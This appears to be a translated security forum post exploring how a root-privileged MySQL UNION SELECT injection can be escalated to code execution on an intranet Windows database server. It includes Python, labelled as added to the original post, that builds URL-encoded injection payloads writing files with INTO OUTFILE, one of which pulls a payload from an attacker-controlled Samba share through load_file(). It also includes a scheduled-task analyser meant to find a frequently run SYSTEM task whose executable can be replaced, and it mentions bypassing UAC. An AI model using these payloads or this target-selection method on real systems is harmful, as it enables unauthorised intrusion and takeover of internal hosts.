PS: I think it is worth recording the process of this exploration. If you have a better idea, please let me know...
Scenario:
Web server: Internet-facing, Apache + PHP
DB server: intranet only, MySQL on Windows 6.1 x64 (Windows 7 / Server 2008 R2)
A GET-based UNION SELECT MySQL injection running with root privileges. How do we turn that into code execution on the DB host?
0x01 Challenge I: no stacked queries
Multi-statement execution is the first problem. Going back as far as the DEFCON 17 paper on advanced MySQL injection (defcon-17-muhaimin_dzulfakar-adv_mysql-wp.pdf), every technique that works without stacked queries revolves around UNION SELECT, combined with load_file() and INTO OUTFILE. Some people have pointed out that the restriction PHP's MySQL layer puts on multi-statement execution can be broken (see: http://zone.wooyun.org/index.php?do=view&id=50), but unfortunately the PDO class is not in use here. If you have cooler tricks, discussion is welcome ~
0x02 Challenge II: GET length limits
The injection is submitted via GET. From the RFCs and from practical server limits we know a URL has a length limit (Apache's LimitRequestLine defaults to 8190 bytes, and older browsers cap the URL at 2083 characters). Trying to run the whole UNION SELECT ... INTO OUTFILE dump directly makes the URL hard to keep under that limit once the payload is encoded. After a moment's thought, though, in some cases (which ones exactly I cannot confirm 100%) the URL limit can be sidestepped by having load_file() pull the payload from a remote file.
Something like select load_file('//blackhat/Public/something_evil.txt'), where blackhat is a Linux box with a simple Samba share. Tested inside the same LAN this reads the content without trouble, but tested across the public Internet it may time out; in addition, a large number of ISPs have been filtering 139/445 on upstream equipment ever since the Blaster worm, so the success rate of this attack is somewhat lower. But what if you have already rooted a machine in the same /24 as the DB server?
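To make the length argument concrete, here is an added example (my own Python, not code from the original post) that builds both forms of the file write as the injected parameter and measures the resulting URL. The endpoint, parameter name, column count, file body and target path are assumptions; the UNC path is the one used above. It also assumes that secure_file_priv does not block load_file()/INTO OUTFILE on the DB server and that the DB host can reach the share.

```python
from urllib.parse import quote, unquote

# Practical request-line limits (assumed values: the Apache LimitRequestLine
# default and the classic Internet Explorer cap on URL length).
APACHE_LIMIT_REQUEST_LINE = 8190
IE_MAX_URL = 2083

BASE_URL = "http://www.example.com/item.php"   # hypothetical injectable page
COLUMNS = 3                                     # assumed UNION column count

# Constructed stand-in for the file we want written on the DB host.
SAMPLE_BODY = ("@echo off\r\n" + "rem filler line to give the body a realistic size\r\n" * 120).encode()
DB_HOST_TARGET = "C:/Windows/Temp/something_evil.txt"  # hypothetical target path on the DB host
UNC_SOURCE = "//blackhat/Public/something_evil.txt"   # attacker-side share, as in the post


def pad_columns(expr, total=COLUMNS):
    """UNION SELECT must match the original query's column count; pad with NULL."""
    return ", ".join([expr] + ["NULL"] * (total - 1))


def hex_literal(data):
    """MySQL reads 0x... as a string, so the value carries no quote characters."""
    return "0x" + data.hex()


def inline_outfile_payload(body, target, columns=COLUMNS):
    """Variant 1: the whole file body travels inside the URL (2 hex chars per byte)."""
    return f"-1 UNION SELECT {pad_columns(hex_literal(body), columns)} INTO OUTFILE '{target}'"


def load_file_outfile_payload(unc_path, target, columns=COLUMNS, quote_free=True):
    """Variant 2: only a UNC path travels in the URL; mysqld fetches the body over SMB."""
    arg = hex_literal(unc_path.encode()) if quote_free else f"'{unc_path}'"
    return f"-1 UNION SELECT {pad_columns(f'load_file({arg})', columns)} INTO OUTFILE '{target}'"


def build_url(payload):
    """Encode every special character so the measured length is what the server sees."""
    return BASE_URL + "?id=" + quote(payload, safe="")


def payload_from_url(url):
    """Inverse of build_url, for checking what the injected parameter decodes to."""
    return unquote(url.split("?id=", 1)[1])


def compare(body=SAMPLE_BODY, unc_path=UNC_SOURCE, target=DB_HOST_TARGET):
    """Build both URLs and report whether each fits the common limits."""
    inline_url = build_url(inline_outfile_payload(body, target))
    remote_url = build_url(load_file_outfile_payload(unc_path, target))
    return {
        "inline_url": inline_url,
        "remote_url": remote_url,
        "inline_fits_apache": len(inline_url) <= APACHE_LIMIT_REQUEST_LINE,
        "inline_fits_ie": len(inline_url) <= IE_MAX_URL,
        "remote_fits_ie": len(remote_url) <= IE_MAX_URL,
    }


if __name__ == "__main__":
    r = compare()
    print(f"inline:    {len(r['inline_url'])} chars, fits Apache default: {r['inline_fits_apache']}")
    print(f"load_file: {len(r['remote_url'])} chars, fits IE cap: {r['remote_fits_ie']}")
    print(payload_from_url(r["remote_url"]))
```

Note the hex literal for the UNC path: MySQL accepts 0x... as the string argument of load_file(), so the short form needs no quote characters at all, whereas the INTO OUTFILE path still has to be a quoted string literal.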
0x03 Challenge III: turning file write into immediate execution
The attempt here is to turn write permission into immediate execution.

Note the emphasis on "immediate": writing a startup item or a DLL hijack is therefore not considered for now. On earlier Windows versions (<= 5.1, i.e. XP/2003) a Kingsoft script used a specially crafted MOF file written to the MOF directory to get a command executed immediately, but that no longer works on later versions. Some will think of scheduled tasks (the .job method). On earlier Windows versions there is a mapping in the registry for each job, the job files live under c:\windows\tasks with a corresponding registry path, so dropping a .job file straight into that directory generally worked.

On the new version I initially did not find anything related in the registry. The configuration file format has changed to XML and the files now live under the new path c:\windows\system32\tasks, so my assumption was that writing a new configuration straight into that directory would get it loaded and run. In fact the scheduler takes a CLSID-style GUID from [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks], and that GUID corresponds to the task's key value under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree]. Since a scheduled task cannot be added just by creating a new configuration file, the next try is to replace the configuration file of an existing task, keeping the same name. Testing shows the file can indeed be replaced (on higher versions with UAC, bypass UAC first). However, the scheduler reads the corresponding configuration from TaskCache first, so this does not work either.
Looking back, a Windows system this huge and this exposed will inevitably have made plenty of security concessions to business needs (UAC bypasses being a typical example). So how was that MOF trick found? By fuzzing system behaviour across a large number of samples, or by respecting certain system principles and tracing back from the functions? By analogy, in web code auditing some friends look for entry points first and then track the data flow to audit for SQL injection, whereas a friend of mine, fed up with the huge number of input points, fuzzed the functional areas and then went straight to the DB logs looking for anomalies. I have to say that was a lot more efficient, and accurate.
As the saying goes: today's testing shows we are still unfamiliar with some system features, and with a more open view we can go further!
Updated ideas (thanks to the experts):
1. Fuzz third-party programs that pick up a written configuration file and execute it immediately
2. Replace the EXE of an existing scheduled task (look for the trigger with the shortest execution interval)
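As an added example (my own Python, not part of the original post) supporting idea 2 above and the TaskCache explanation in 0x03: it parses Task Scheduler 2.0 XML files offline, ranks tasks by their shortest Repetition/Interval while noting which run as SYSTEM, and models the Tree -> Tasks lookup to show why an XML file merely dropped into C:\Windows\System32\Tasks with no registry entries is never loaded. All task names, GUIDs, commands and registry contents below are constructed; on a real host you would feed it the files under that directory and the values read from the two TaskCache keys.

```python
import re
import xml.etree.ElementTree as ET

NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
TASKS_DIR = r"C:\Windows\System32\Tasks"
SYSTEM_SID = "S-1-5-18"

# Constructed task files in the Task Scheduler 2.0 XML schema (names and commands are made up).
TASK_XML = {
    r"\Vendor\Updater": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers><TimeTrigger><StartBoundary>2013-01-01T00:00:00</StartBoundary>
<Repetition><Interval>PT10M</Interval><Duration>P1D</Duration></Repetition></TimeTrigger></Triggers>
<Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
<Actions Context="Author"><Exec><Command>C:\Program Files\Vendor\updater.exe</Command><Arguments>/check</Arguments></Exec></Actions>
</Task>""",
    r"\Backup\Nightly": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers><CalendarTrigger><StartBoundary>2013-01-01T01:00:00</StartBoundary>
<Repetition><Interval>PT1H</Interval></Repetition><ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay></CalendarTrigger></Triggers>
<Principals><Principal id="Author"><UserId>CORP\backupsvc</UserId><RunLevel>LeastPrivilege</RunLevel></Principal></Principals>
<Actions Context="Author"><Exec><Command>C:\Backup\run.bat</Command></Exec></Actions>
</Task>""",
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
<Triggers><CalendarTrigger><StartBoundary>2013-01-02T01:00:00</StartBoundary>
<ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek></CalendarTrigger></Triggers>
<Principals><Principal id="Author"><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
<Actions Context="Author"><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c</Arguments></Exec></Actions>
</Task>""",
}

# Constructed model of the two TaskCache keys named in the post: Tree\<name>\Id -> Tasks\{Id}\Path.
TREE = {
    r"\Vendor\Updater": {"Id": "{00000000-0000-0000-0000-000000000001}"},
    r"\Backup\Nightly": {"Id": "{00000000-0000-0000-0000-000000000002}"},
    r"\Microsoft\Windows\Defrag\ScheduledDefrag": {"Id": "{00000000-0000-0000-0000-000000000003}"},
}
TASKS = {
    "{00000000-0000-0000-0000-000000000001}": {"Path": r"\Vendor\Updater"},
    "{00000000-0000-0000-0000-000000000002}": {"Path": r"\Backup\Nightly"},
    "{00000000-0000-0000-0000-000000000003}": {"Path": r"\Microsoft\Windows\Defrag\ScheduledDefrag"},
}

_DURATION = re.compile(r"^P(?:(\d+)D)?(?:T(?:(\d+)H)?(?:(\d+)M)?(?:(\d+)S)?)?$")


def parse_duration(text):
    """ISO 8601 duration as Task Scheduler writes it (PT10M, P1DT2H30M, ...) -> seconds."""
    m = _DURATION.match(text.strip())
    if not m:
        raise ValueError(f"unsupported duration: {text!r}")
    days, hours, minutes, seconds = (int(x) if x else 0 for x in m.groups())
    return ((days * 24 + hours) * 60 + minutes) * 60 + seconds


def analyze_task(name, xml_text):
    """Pull out what matters for idea 2: who runs the task, what it executes, how often."""
    root = ET.fromstring(xml_text)
    triggers = root.find("t:Triggers", NS)
    trigger_types = [] if triggers is None else [child.tag.split("}")[-1] for child in triggers]
    intervals = [parse_duration(e.text) for e in root.findall("t:Triggers/*/t:Repetition/t:Interval", NS)]
    user = (root.findtext("t:Principals/t:Principal/t:UserId", namespaces=NS)
            or root.findtext("t:Principals/t:Principal/t:GroupId", namespaces=NS) or "")
    commands = [(e.findtext("t:Command", namespaces=NS) or "", e.findtext("t:Arguments", namespaces=NS) or "")
                for e in root.findall("t:Actions/t:Exec", NS)]
    return {
        "name": name,
        "user": user,
        "runs_as_system": user.upper() in (SYSTEM_SID, "SYSTEM", r"NT AUTHORITY\SYSTEM"),
        "run_level": root.findtext("t:Principals/t:Principal/t:RunLevel", namespaces=NS),
        "triggers": trigger_types,
        "commands": commands,
        "shortest_interval": min(intervals) if intervals else None,
    }


def rank_tasks(task_xml):
    """Most frequently repeating task first; tasks with no Repetition element last."""
    rows = [analyze_task(name, xml) for name, xml in task_xml.items()]
    return sorted(rows, key=lambda r: (r["shortest_interval"] is None, r["shortest_interval"] or 0))


def resolve_task_file(tree, tasks, name):
    """Model the scheduler's lookup: a task exists only if Tree and Tasks both know it.
    An XML file merely dropped into TASKS_DIR has no entry and resolves to None."""
    entry = tree.get(name)
    if entry is None:
        return None
    task = tasks.get(entry["Id"])
    if task is None:
        return None
    return TASKS_DIR + task["Path"]


if __name__ == "__main__":
    for row in rank_tasks(TASK_XML):
        print(row["shortest_interval"], row["user"], row["commands"], row["name"])
    print(resolve_task_file(TREE, TASKS, r"\Vendor\Updater"))
    print(resolve_task_file(TREE, TASKS, r"\Dropped\NewTask"))
```

The ranking only tells you which task's EXE is worth replacing; whether the Command path is actually writable from the MySQL service account is a separate check on the real host, and a task with no Repetition element (the defrag example) may still fire soon if its StartBoundary or weekly schedule happens to be close.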
[If there are any errors in this article, I would be extremely grateful for corrections]